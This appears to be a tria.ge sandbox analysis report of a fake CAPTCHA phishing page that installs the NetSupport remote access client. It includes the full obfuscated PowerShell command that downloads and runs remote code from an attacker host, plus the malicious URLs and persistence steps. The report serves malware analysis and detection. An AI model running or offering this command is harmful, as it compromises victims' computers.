Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
23/10/2024, 01:15
241023-bmlphstemh 423/10/2024, 00:50
241023-a65q3asfkh 423/10/2024, 00:31
241023-at4y1asana 422/10/2024, 14:58
241022-schzba1apc 1022/10/2024, 12:40
241022-pwj4yavgmd 10Analysis
-
max time kernel
123s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22/10/2024, 14:58
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://holidaybunch.com
Resource
win10v2004-20241007-en
Errors
General
-
Target
https://holidaybunch.com
Malware Config
Extracted
https://holidaybunch.com/Ray-verify.html
Extracted
http://traversecityspringbreak.com/o/o.png
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Blocklisted process makes network request 4 IoCs
flow pid Process 56 5904 mshta.exe 58 5904 mshta.exe 60 5904 mshta.exe 64 5372 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 5656 client32.exe -
Loads dropped DLL 5 IoCs
pid Process 5656 client32.exe 5656 client32.exe 5656 client32.exe 5656 client32.exe 5656 client32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\PQRMwm\\client32.exe" powershell.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: client32.exe File opened (read-only) \??\N: client32.exe File opened (read-only) \??\O: client32.exe File opened (read-only) \??\P: client32.exe File opened (read-only) \??\S: client32.exe File opened (read-only) \??\Z: client32.exe File opened (read-only) \??\B: client32.exe File opened (read-only) \??\E: client32.exe File opened (read-only) \??\J: client32.exe File opened (read-only) \??\V: client32.exe File opened (read-only) \??\Y: client32.exe File opened (read-only) \??\I: client32.exe File opened (read-only) \??\K: client32.exe File opened (read-only) \??\Q: client32.exe File opened (read-only) \??\U: client32.exe File opened (read-only) \??\X: client32.exe File opened (read-only) \??\G: client32.exe File opened (read-only) \??\H: client32.exe File opened (read-only) \??\L: client32.exe File opened (read-only) \??\M: client32.exe File opened (read-only) \??\R: client32.exe File opened (read-only) \??\T: client32.exe File opened (read-only) \??\W: client32.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 1028 cmd.exe -
Detected phishing page
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language client32.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 3304 ipconfig.exe -
Modifies Control Panel 28 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\Arrow client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeNS client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeNWSE client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeWE client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeWE = "C:\\Windows\\cursors\\aero_ew.cur" client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeAll client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\NWPen = "C:\\Windows\\cursors\\aero_pen.cur" client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeNWSE = "C:\\Windows\\cursors\\aero_nwse.cur" client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\UpArrow = "C:\\Windows\\cursors\\aero_up.cur" client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\IBeam client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\NWPen client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\Wait client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeNESW = "C:\\Windows\\cursors\\aero_nesw.cur" client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeNS = "C:\\Windows\\cursors\\aero_ns.cur" client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\Crosshair client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\cursors\\aero_arrow.cur" client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\Help = "C:\\Windows\\cursors\\aero_helpsel.cur" client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\Help client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\UpArrow client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeAll = "C:\\Windows\\cursors\\aero_move.cur" client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\AppStarting client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\No client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\No = "C:\\Windows\\cursors\\aero_unavail.cur" client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\Wait = "C:\\Windows\\cursors\\aero_busy.ani" client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\Hand client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeNESW client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\cursors\\aero_working.ani" client32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\Hand = "C:\\Windows\\cursors\\aero_link.cur" client32.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\Main\SmoothScroll = "0" client32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\Main\SmoothScroll = "1" client32.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "157" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1444 msedge.exe 1444 msedge.exe 3808 msedge.exe 3808 msedge.exe 3704 identity_helper.exe 3704 identity_helper.exe 5372 powershell.exe 5372 powershell.exe 5372 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 5372 powershell.exe Token: SeSecurityPrivilege 5656 client32.exe Token: SeShutdownPrivilege 5656 client32.exe -
Suspicious use of FindShellTrayWindow 29 IoCs
pid Process 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 5656 client32.exe 3808 msedge.exe 5656 client32.exe 5656 client32.exe -
Suspicious use of SendNotifyMessage 25 IoCs
pid Process 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 3808 msedge.exe 5656 client32.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2160 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3808 wrote to memory of 3032 3808 msedge.exe 84 PID 3808 wrote to memory of 3032 3808 msedge.exe 84 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 1444 3808 msedge.exe 86 PID 3808 wrote to memory of 1444 3808 msedge.exe 86 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1984 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://holidaybunch.com1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xb4,0x108,0x7ffdcccc46f8,0x7ffdcccc4708,0x7ffdcccc47182⤵PID:3032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:22⤵PID:3084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2616 /prefetch:82⤵PID:2784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:12⤵PID:3120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:12⤵PID:1764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:82⤵PID:2804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:12⤵PID:5568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:12⤵PID:5576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:12⤵PID:5920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:12⤵PID:5928
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5076
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4568
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://holidaybunch.com/Ray-verify.html # ''Verify you are human - Ray Verification ID: 5328''1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:5904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5372 -
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /flushdns3⤵
- Gathers network information
PID:3304
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Admin\AppData\Roaming\PQRMwm3⤵
- Hide Artifacts: Hidden Files and Directories
PID:1028 -
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\AppData\Roaming\PQRMwm4⤵
- Views/modifies file attributes
PID:1984
-
-
-
C:\Users\Admin\AppData\Roaming\PQRMwm\client32.exe"C:\Users\Admin\AppData\Roaming\PQRMwm\client32.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5656
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3644
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa38c1855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2160
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5dc058ebc0f8181946a312f0be99ed79c
SHA10c6f376ed8f2d4c275336048c7c9ef9edf18bff0
SHA256378701e87dcff90aa092702bc299859d6ae8f7e313f773bf594f81df6f40bf6a
SHA51236e0de64a554762b28045baebf9f71930c59d608f8d05c5faf8906d62eaf83f6d856ef1d1b38110e512fbb1a85d3e2310be11a7f679c6b5b3c62313cc7af52aa
-
Filesize
152B
MD5a0486d6f8406d852dd805b66ff467692
SHA177ba1f63142e86b21c951b808f4bc5d8ed89b571
SHA256c0745fd195f3a51b27e4d35a626378a62935dccebefb94db404166befd68b2be
SHA512065a62032eb799fade5fe75f390e7ab3c9442d74cb8b520d846662d144433f39b9186b3ef3db3480cd1d1d655d8f0630855ed5d6e85cf157a40c38a19375ed8a
-
Filesize
253B
MD5e54bd90687c7a48c962af4fef19e2169
SHA112f2e25af1d9b83e44165bdbe607a5cf8b6c709e
SHA256d4b137c5ce43c6a01ae5914e409a00bda79d58e239d8fc3d7d9f358188bc695e
SHA512ecdbe859ff50374db5bf9c5082dfddb966840d925ea32d0b18a4337a7e0078712f37d72cd2383baa4e6344df5e3be43553fa3d6793967249d7319384bcc13750
-
Filesize
6KB
MD504e025937d98e60fc59aad08bf1163af
SHA193ed794f1edfd4ddd28694dd1626b5b092aba0c3
SHA256c3f70791594bf048a430b71a95525088936715efb3f5e80c7e927b6fcb07017e
SHA512a05624ec92108ea26a0f87fbcc7960c65aa9a4d4a6fc8018e75566487f3ac6dca36e8fb46c6e83afa51e02eb29d564eb8e2eb2e14f0313c9406a1672874bd834
-
Filesize
6KB
MD5487387c793561f080e95fb2da4bb0c9d
SHA157d78a003515db7aa690557a80c72c32a692726f
SHA25660ba77224d3bc684073c9994354bca09e1223d99eccb2f7f99c3389d3b48d9cf
SHA51282a495c1d2eb9f3d62f8ca6da5b8104764642f10eb52eea825a86ecf671fece53b61fbaf20bbd854ae68e0ea04118cae72ed04b303d5516ac3f828917a93d929
-
Filesize
5KB
MD56312b01498949d1c639059fada2fcf95
SHA1fa1acda5f160705ac5b4f9375cd6bcda2925b4a6
SHA256321690b86e233aaaa5d17aa274914f2e204ff6313d20922e11c88f3ec4eda1f7
SHA512b375dc32cfd04d4e58e1b1c9b5fda26a760e5bfc023c2cefff0fd0d51355703cc1b5c23250356bd2379674d33fb89f1e451a7c01bb09eed57d08638b4277ad08
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD511386d984fdcd7f700b2ffd29e07b62b
SHA11d0b23b60a7a7727d4287969055a460882f08d76
SHA256acb2b12d93e5d8cca48e1ebc8b69d0c487265c2fdad864ce15bc039863a438e8
SHA512320d7ef8466fc165339b28a99bc8a1d062729cfaf18ec72d7788dc785266a750ca69833ace559688c431c4a3b5f4eba2729ead4be414a8b51d26ad418713f855
-
Filesize
11KB
MD5d110accf3ae0b1338a96db51976066fe
SHA1a50c81e9e6ee2739e08584ce17d96ea13588d7f4
SHA256d4f221bb9acaea2d1419e667da1a23653efb5d84143c1494f7201f89d15816d4
SHA512fdd324b6b1c302742c648d0ab702f18ccc18787a287b362ad15fa3b53bd39009ea89baeb6d889c9d2c8b1cb5277578c7b0ef81040471f09173ac6c99c9d13d15
-
Filesize
11KB
MD5b6e7d817b1fe21cfa7ec04a8980bbb69
SHA1d66f8fbb467a26cf9a11600cb63e4d475407c736
SHA2569f3f331b269677cad842c3ed42cb85c21e060a8fd4687a897a90cc2770fbe5d0
SHA51269494161506112479431fcbc27f26d1cf7a50ff170620c723513e293d4d7d3f090a1377585356a48802d974cd875703bbff5b94dea3e601a78701fbe6a04695e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
320KB
MD52d3b207c8a48148296156e5725426c7f
SHA1ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA51255c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c
-
Filesize
257B
